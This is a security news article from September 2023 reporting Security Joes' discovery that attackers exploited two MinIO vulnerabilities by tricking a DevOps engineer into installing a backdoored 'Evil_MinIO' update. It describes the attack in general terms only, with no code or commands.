Emerging Cloud Attack Vector: A Case Study on MinIO Exploitation
September 6, 2023
An innovative cloud attack vector has surfaced, granting cybercriminals the ability to remotely execute code and seize control of systems running the distributed object storage system, MinIO. This open-source service, compatible with Amazon S3's cloud storage, is used by businesses to manage unstructured data such as photos, videos, log files, backups, and container images.
Recently, Security Joes researchers detected threat actors exploiting a series of critical vulnerabilities in MinIO (CVE-2023-28434 and CVE-2023-28432) to penetrate a corporate network. According to the researchers, 'The specific exploit chain we stumbled into was not observed in the wild before, or at least documented, making this the first instance of evidence showcasing such non-native solutions are being adopted by attackers.' The researchers were surprised to find that these products were susceptible to a new set of critical vulnerabilities that were relatively easy to exploit.
In this particular attack, a DevOps engineer was tricked into updating MinIO to a new version that essentially functioned as a backdoor. The update was a weaponized version of MinIO with a built-in command shell function called 'GetOutputDirectly(),' and remote code execution (RCE) exploits for the two disclosed vulnerabilities. This booby-trapped version, known as 'Evil_MinIO,' is available on a GitHub repository.
Although the attack was halted before reaching the RCE-and-takeover stage, the existence of this malicious software variant should serve as a warning to users to be vigilant against future attacks, particularly those targeting software developers. A successful attack could reveal sensitive corporate data and intellectual property, provide access to internal applications, and enable attackers to delve deeper into an organization's infrastructure.
Security Joes emphasized the critical importance of security throughout the software development lifecycle in their investigation report. 'Failing to explicitly recognize the paramount importance of security across the entirety of the software development lifecycle constitutes a critical oversight,' they stated. They warned that such negligence could expose an organization to substantial risks that, while not immediate, lurk in the shadows, waiting for the right opportunity to exploit.
Related News
- MinIO Storage System Exploited by Hackers to Infiltrate Corporate Networks
- ChatGPT Data Breach Confirmed Amid Vulnerable Component Exploitation Warning
Latest News
- Google Patches Android Zero-Day Exploit with September 2023 Security Updates
- MinIO Storage System Exploited by Hackers to Infiltrate Corporate Networks
- Critical VMware SSH Authentication Bypass Vulnerability Exploited: Details and Mitigation
- Kinsing Cybercrime Group Targets OpenFire Cloud Servers with New Attack Vector
- Critical SSH Authentication Bypass Vulnerability Detected in VMware Aria
Like what you see?
Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.